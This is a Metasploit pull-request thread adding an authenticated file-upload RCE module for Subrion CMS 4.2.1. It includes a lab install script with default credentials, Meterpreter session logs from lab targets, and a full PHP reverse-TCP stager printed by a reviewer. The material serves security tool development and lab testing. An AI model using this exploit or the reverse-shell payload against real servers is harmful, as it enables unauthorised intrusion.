Add module and documentation for Subrion CMS v4.2.1 RCE

[ismaildawoodjee]

Complex Software Examples:

• Software with an extensive installation process - Subrion CMS v4.2.1 may require an extensive installation process when installing without the script below.

Setup

According to the official installation page, the setup for Subrion CMS v4.2.1 requires at least:

- Apache Server 1.3 or above (with `mod_rewrite`) installed
- PHP version 5 or above (with extensions GD lib, XML lib, FreeType installed)
- MySQL version 4.1 or above

LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with sudo user permissions. To be able to actually copy and paste the script, open-vm-tools and open-vm-tools-desktop need to be installed via apt if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.

Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution when using XAMPP in Windows, neither with a basic webshell nor with the PhpEXE mixin payload.

Installation script on a fresh Debian 10 VM:

#!/bin/bash

# to be able to copy and paste, and add firewall tool
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y vim ufw curl unzip open-vm-tools open-vm-tools-desktop
sudo systemctl restart ufw
sudo systemctl enable ufw

# install mysql v5.7
# https://computingforgeeks.com/how-to-install-mysql-on-debian-linux-system/?expand_article=1
wget -P ~/Downloads/ https://dev.mysql.com/get/mysql-apt-config_0.8.18-1_all.deb
sudo dpkg -i ~/Downloads/mysql-apt-config_0.8.18-1_all.deb
sudo apt update -y && sudo apt upgrade -y

# if the above gives an error, run:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 467B942D3A79BD29
sudo apt update -y && sudo apt upgrade -y

# NOTE: I installed MySQL 5.7 in my first two attempts on a fresh Debian 10, but can't install it again afterwards because of error:
# E: Unable to locate package mysql-community-server
# If this happens, use a Docker to serve a MySQL container:
# sudo apt install -y default-mysql-server docker.io
# sudo docker run --name subriondb -e MYSQL_ROOT_PASSWORD=root -d mysql:5.7.42-debian
# sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb
# mysql -h [SUBRIONDB_IP] -u root -proot
# mysql -h [SUBRIONDB_IP] -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@[SUBRIONDB_IP] IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

# choose mysql-5.7, set root password "root", and allow MySQL remote connections
sudo apt install -y mysql-community-server 
sudo ufw allow mysql
sudo systemctl restart mysql
sudo systemctl enable mysql

# install php v7.3 and php extensions, and enable apache module
# https://computingforgeeks.com/install-php-on-debian-linux-systen/?expand_article=1
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y php php-common
sudo apt install -y php-cli php-fpm php-json php-pdo php-mysql php-zip php-gd  php-mbstring php-curl php-xml php-pear php-bcmath
sudo apt install -y libapache2-mod-php
sudo a2enmod php7.*

# install apache2 v2.4.38
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y apache2
sudo apt install -y libapache2-mod-php
sudo a2enmod rewrite
sudo systemctl restart apache2
sudo systemctl enable apache2

# create MySQL database for Subrion (with password "root")
mysql -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

# download and install Subrion 4.2.1
# https://www.vultr.com/docs/install-subrion-cms-with-lamp-stack-on-ubuntu-20-04/
# https://github.com/intelliants/subrion/wiki/Installation
sudo mkdir -p /var/www/subrion
sudo wget -P /var/www/subrion/ https://tools.subrion.org/get/latest.zip
sudo unzip /var/www/subrion/latest.zip -d /var/www/subrion/
sudo rm -rf /var/www/subrion/latest.zip
sudo chown -R www-data:www-data /var/www/subrion

# create virtual host for serving vulnerable Subrion website
sudo a2dissite /etc/apache2/sites-available/000-default.conf
sudo touch /etc/apache2/sites-available/subrion.conf
sudo bash -c 'cat << EOF > /etc/apache2/sites-available/subrion.conf
<VirtualHost *:80>
    ServerName subrion-vuln.com
    DocumentRoot "/var/www/subrion"
    <Directory "/var/www/subrion">
        Require all granted
        Options -Indexes +FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from all
    </Directory>
   ErrorLog ${APACHE_LOG_DIR}/error.log
   CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
EOF'
sudo a2ensite subrion.conf
sudo systemctl restart apache2
echo '127.0.0.1 subrion-vuln.com' | sudo tee -a /etc/hosts

# navigate to subrion-vuln.com
python3 -m webbrowser 'http://subrion-vuln.com'
exit

This will set up Subrion CMS 4.2.1 as a virtual host website on http://subrion-vuln.com using the LAMP stack:

- Debian 10
- Apache Server v2.4.38
- MySQL v5.7.42
- PHP v7.3.31

LAMP on Debian 10:

ismail@debian:/usr/bin$ cat /etc/os-release 
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

ismail@debian:/usr/bin$ /usr/sbin/apache2 -v
Server version: Apache/2.4.38 (Debian)
Server built:   2023-04-21T22:01:00

ismail@debian:/usr/bin$ mysql --version
mysql  Ver 14.14 Distrib 5.7.42, for Linux (x86_64) using  EditLine wrapper

ismail@debian:/usr/bin$ php -v
PHP 7.3.31-1~deb10u4 (cli) (built: Jun 19 2023 19:10:11) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.31, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.31-1~deb10u4, Copyright (c) 1999-2018, by Zend Technologies

Once this is done, and after the web browser opens up the Subrion CMS installation page at http://subrion-vuln.com/install, fill in the following fields in the Configuration page after passing the Pre-Installation Check and accepting the Subrion License:

DB Hostname:  localhost (default)

# if using a MySQL Docker container, put in the IP address found from the output of the following command:
# sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb

DB Username:  root
DB Password:  root
DB Name:      subrion
DB Port:      3306 (default)
Table Prefix: sbr421_ (default)

Administrator Configuration:

Username:  admin
Password:  admin
Confirm:   admin
Email:     anyemail@mail.com

Once the configuration is done, navigate to http://subrion-vuln.com/panel/ and login as an Administrator to confirm successful setup.

Verification Steps

1. Install and set up Subrion CMS v4.2.1 as described above.
2. Verify that the admin panel login page can be accessed at http://subrion-vuln.com/panel/.
3. Start msfconsole and follow along with default options
4. Do: use exploit/linux/http/subrion_cms_file_upload_rce
5. Do: set RHOSTS [SUBRION_SERVER_IP]
6. Do: set LHOST eth0
7. Do: exploit

Options

RPORT (Required)

This is the default HTTP port 80 for the Subrion CMS website.

TARGETURI (Required)

This is the base path of the Subrion CMS's website. Can be changed in case the files are not installed as a VHost, for example, in /var/www/html/subrion/* and not in /var/www/subrion/*

USERNAME (Required)

This is the username for the Subrion CMS admin panel page, required for exploitation.

PASSWORD (Required)

This is the password for the Subrion CMS admin panel page, also required for exploitation.

Scenarios

Subrion CMS v4.2.1 on Debian 10

• Using PHP paylod - default TARGET 0

msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
RHOSTS => 192.168.245.133
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => 192.168.245.128
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.245.133:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: mKMUcUoMJjRxTxOog8DXxeFxLGQVU7rHSX6slM85
[*] Logging in to Subrion Admin Panel at: http://192.168.245.133/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.245.133/uploads/htwgmjllep.phar
[*] Executing 'htwgmjllep.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.133
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.133:53698) at 2023-07-21 14:21:17 -0400
[+] Successfully executed payload: http://192.168.245.133/uploads/htwgmjllep.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > 

Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)

• Also using PHP paylod - default TARGET 0

msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
RHOSTS => 192.168.195.163
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST tun0
LHOST => tun0
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LPORT 80
LPORT => 80
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.45.162:80 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.195.163:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: rtPDWFrHa45hIhhXhLknM7DbWiHqAfux1fziFd3j
[*] Logging in to Subrion Admin Panel at: http://192.168.195.163/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.195.163/uploads/ixqywjyjyd.phar
[*] Executing 'ixqywjyjyd.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.195.163
[*] Meterpreter session 1 opened (192.168.45.162:80 -> 192.168.195.163:57658) at 2023-07-24 10:35:58 -0400
[+] Successfully executed payload: http://192.168.195.163/uploads/ixqywjyjyd.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : exfiltrated
OS          : Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 2489 created.
Channel 0 created.
cat /etc/os-release               
NAME="Ubuntu"
VERSION="20.04.2 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.2 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

[cdelafuente-r7]

Thanks for this module @ismaildawoodjee ! This looks great. I just left a few comments and suggestions for you to review when you get a chance. I'll start testing once it is done.

[cdelafuente-r7]

Did you get any error? Or maybe anything interesting in the server logs? We can hep to debug this and make it work on Windows too.

[ismaildawoodjee]

I downloaded and installed XAMPP 7.4.3 from here, and installed PHP 7.4.3 on Windows 10 and added to PATH. Expanded the Subrion 4.2.1 zip file in C:\xampp\htdocs\ and set it up easily.

After that I got quite a few warnings and deprecation notices, probably because it was PHP 7.4 and curly brace syntax was deprecated, but it probably wouldn't affect PHP file execution.

My initial hunch was that the PHP extension to execute .phar files was not installed on the Windows 10 host but according to https://stackoverflow.com/questions/66868454/install-it-or-recompile-php-without-disable-phar-on-windows, phar extensions are enabled by default and I also found phar when running php -m.

PS C:\WINDOWS\system32> php -v
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:46) ( ZTS Visual C++ 2017 x64 )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
PS C:\WINDOWS\system32> php -m
[PHP Modules]
bcmath
bz2
calendar
Core
ctype
curl
date
dom
exif
fileinfo
filter
ftp
gd
gettext
hash
iconv
json
libxml
mbstring
mysqli
mysqlnd
openssl
pcre
PDO
pdo_mysql
pdo_sqlite
Phar    <<------<
readline
Reflection
session
SimpleXML
SPL
standard
tokenizer
xml
xmlreader
xmlwriter
zip
zlib

[Zend Modules]

Also disabled the phar.readonly and phar.require_hash settings in the php.ini file. Restarted Apache and retested, but no luck:

I get this error when looking at the source code of the web page:

The Apache error.log is ok, but to get the php_error_log, you need to create a folder: https://stackoverflow.com/questions/43247952/php-error-log-missing-in-xampp

But there's nothing of note in the Apache access.log or error.log or php_error_log.txt.

[jmartin-tech]

Is there are more straight forward way to parse out the version here?

[ismaildawoodjee]

I could parse it in a way similar to how I obtained the CSRF token.

[ismaildawoodjee]

Implemented changes on Lines 95-97

[cdelafuente-r7]

Thanks for updating this @ismaildawoodjee. I just left a few more comments. I successfully tested using a Docker image and a Windows installation (see my comments below).

[cdelafuente-r7]

I managed to run version 4.1.0 using docker. I used a modified docker-compose.yml from the official repository:

version: '3'

services:
  subrion:
    image: intelliants/subrion
    container_name: subrion
    links:
      - subriondb:mysql
    ports:
      - 8080:80
    environment:
      SUBRION_DB_PASSWORD: secretpass

  subriondb:
    image: mysql:5.6
    container_name: subriondb
    environment:
      MYSQL_ROOT_PASSWORD: secretpass

Then run docker-compose up.

The config embedded in this docker image does not include .phar file type to be parsed through the PHP handler . I needed to update the `/etc/apache2/conf-enabled/docker-php.conf' configuration file in the container and reload Apache:

❯  docker exec -ti subrion bash
root@f9e6aa4a9e5b:/var/www/html# sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf
root@f9e6aa4a9e5b:/var/www/html# /etc/init.d/apache2 reload
[ ok ] Reloading web server: apache2.

Then just finish the installation at http://127.0.0.1:8080/ with the following values:

DB Hostname:  subriondb
DB Username:  root
DB Password:  secretpass
DB Name:      subrion
DB Port:      3306 (default)
Table Prefix: sbr421_ (default)

Administrator Configuration:

Username:  admin
Password:  123456
Confirm:   123456
Email:     anyemail@mail.com

Please, would you mind adding this installation alternative to the documentation?

[ismaildawoodjee]

Thanks for the additional testing. I'll try it out myself soon and add the results to the documentation.

[cdelafuente-r7]

I managed to make it work on Windows. Same than the docker builds, the XAMPP's Apache configuration does not include the .phar file type to be parsed through the PHP handler. This what I've done:

1. Install XAMPP 7.4.3
2. Modify C:\xampp\apache\conf\extra\httpd-xampp.conf
   Change this line:

<FilesMatch "\.php$">

to this:

<FilesMatch "\.(php|phar)$">

3. Restart Apache

This is the Metasploit console output:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.103/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.103
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN2019
OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows

Please, can you update the documentation with these Windows installation steps?

[ismaildawoodjee]

That's great to know. So it was a XAMPP specific problem/configuration? I also tried an alternative installation using WAMP.NET and failed to get RCE. I'll look at it soon and add to the docs, a bit occupied at the moment.

[ismaildawoodjee]

Added the installation instructions for both Docker and XAMPP. If you don't mind, may I know how you found out about the configuration file not allowing execution of .phar files? I searched and searched but could not find the solution 😕

[cdelafuente-r7]

Thank you for updating the documentation. I accessed the .phar file directly with a browser after it had been uploaded by the module and noticed the php code was not interpreted by the server. I've seen this before and immediately thought about a configuration issue. I had to look into all the configuration files to locate the correct FilesMatch and modify it.

[cdelafuente-r7]

Thanks for updating this. Since it is a generic PHP target and it is compatible with both Linux and Windows, would you mind moving the module under modules/exploits/multi/http/ and the documentation under documentation/modules/exploit/multi/http/?

[ismaildawoodjee]

Thanks for updating this. Since it is a generic PHP target and it is compatible with both Linux and Windows, would you mind moving the module under modules/exploits/multi/http/ and the documentation under documentation/modules/exploit/multi/http/?

Sure, I'll do that. However, I noticed an issue with the php/windows Meterpreter session that opens on Windows targets. Meterpreter commands can be ran but after I spawn a shell with shell, CMD commands such as whoami or dir do not get run and they eventually timeout in the shell.

The following exploits were against a XAMPP configuration on Windows 10, set up according to the instructions in the README. The Meterpreter session opens, but shell commands cannot be ran:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 4ZYPtRV9oZEboIGk2LPXJEorkgwUnW3NoaNxw8HE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/hnhzicvsca.phar
[*] Executing 'hnhzicvsca.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:63453) at 2023-08-01 07:29:20 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/hnhzicvsca.phar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-50BU5J8
OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 14308 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>whoami    <<---------<< Here, the shell becomes unresponsive and the following prompt appears

Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > 
[*] 192.168.29.1 - Meterpreter session 1 closed.  Reason: Died

The Meterpreter session dies after I try to get another shell:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 2252t69N1EcpnkeSx8J6qVcMtYfbgiskdBgOSRYE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/ymsmovwlju.phar
[*] Executing 'ymsmovwlju.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 3 opened (192.168.245.128:4444 -> 192.168.245.1:63495) at 2023-08-01 07:35:15 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/ymsmovwlju.phar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-50BU5J8
OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 1508 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>dir

Terminate channel 0? [y/N]  N

Terminate channel 0? [y/N]  N

Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell

[*] 192.168.29.1 - Meterpreter session 3 closed.  Reason: Died
[-] Error running command shell: Rex::TimeoutError Send timed out
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > 

Could you confirm that this also happens on your end? Perhaps I can raise an issue if it's not specific to my machine.

[cdelafuente-r7]

Thanks for reporting this. I confirmed the issue is not related to your module. I tried with both PHP version 7.4.3 and 8.9.0 and got the same issue.

On Metasploit console:

msf6 payload(php/meterpreter/reverse_tcp) > set lhost 192.168.100.1
lhost => 192.168.100.1
msf6 payload(php/meterpreter/reverse_tcp) > generate -f raw
/*<?php /**/ error_reporting(0); $ip = '192.168.100.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
msf6 payload(php/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(php/meterpreter/reverse_tcp) >
[*] Sending stage (39927 bytes) to 192.168.100.146
[*] Meterpreter session 5 opened (192.168.100.1:4444 -> 192.168.100.146:50581) at 2023-08-02 14:44:24 +0200

msf6 payload(php/meterpreter/reverse_tcp) >
msf6 payload(php/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer    : WIN112H22
OS          : Windows NT WIN112H22 10.0 build 22621 (Windows 11) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username:
meterpreter > shell
Process 10328 created.
Channel 0 created.
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\php>ls
[hang]

On the target:

C:\php>php.exe -v
PHP 8.2.9 (cli) (built: Aug  1 2023 12:35:15) (ZTS Visual C++ 2019 x64)
Copyright (c) The PHP Group
Zend Engine v4.2.9, Copyright (c) Zend Technologies

C:\php>php.exe -a
Interactive shell

php > /*<?php /**/ error_reporting(0); $ip = '192.168.100.1'; $port = 4444; if (($f = 'stream_socket_client') && is_call
able($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s
 = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_S
TREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die
('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case
 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = '
'; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket':
 $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (ex
tension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhos
in_bypass(); } else { eval($b); } die();

[ismaildawoodjee]

@cdelafuente-r7 I believe this module should be good to go unless there's something else you'd like me to do. Feel free to review and do additional testing (maybe with proxies, etc.), or merge it whenever its convenient. Thanks for the reviews and troubleshooting with the XAMPP and Docker installations 💯

[cdelafuente-r7]

Thanks @ismaildawoodjee ! It looks good to me now. I retested everything and it works as expected. I'll go ahead and land it.

Example output

Subrion CMS Version 4.1.0 on Docker

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=127.0.0.1 rport=8080 lhost=192.168.100.1 username=admin password=123456 verbose=true

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://127.0.0.1:8080/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.1.0.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 1f0170280dda4388ea7551c37a198bcf
[*] Logging in to Subrion Admin Panel at: http://127.0.0.1:8080/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://127.0.0.1:8080/uploads/yigxkmiwvc.phar
[*] Executing 'yigxkmiwvc.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.1
[*] Meterpreter session 1 opened (192.168.100.1:4444 -> 192.168.100.1:62542) at 2023-08-03 18:01:36 +0200
[+] Successfully executed payload: http://127.0.0.1:8080/uploads/yigxkmiwvc.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ea31108cd666
OS          : Linux ea31108cd666 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux

Subrion CMS Version 4.2.0 on Windows

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.109 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.109/subrion/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: EE8xz2t22m5qUpKmrs6DB3G2bKobbw7lQf9KL2C9
[*] Logging in to Subrion Admin Panel at: http://192.168.100.109/subrion/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.109/subrion/uploads/lvjvrhcknt.phar
[*] Executing 'lvjvrhcknt.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.109
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.109:49694) at 2023-08-03 18:05:33 +0200
[+] Successfully executed payload: http://192.168.100.109/subrion/uploads/lvjvrhcknt.phar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN2019
OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows

[cdelafuente-r7]

Thank you @ismaildawoodjee for your contribution!

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.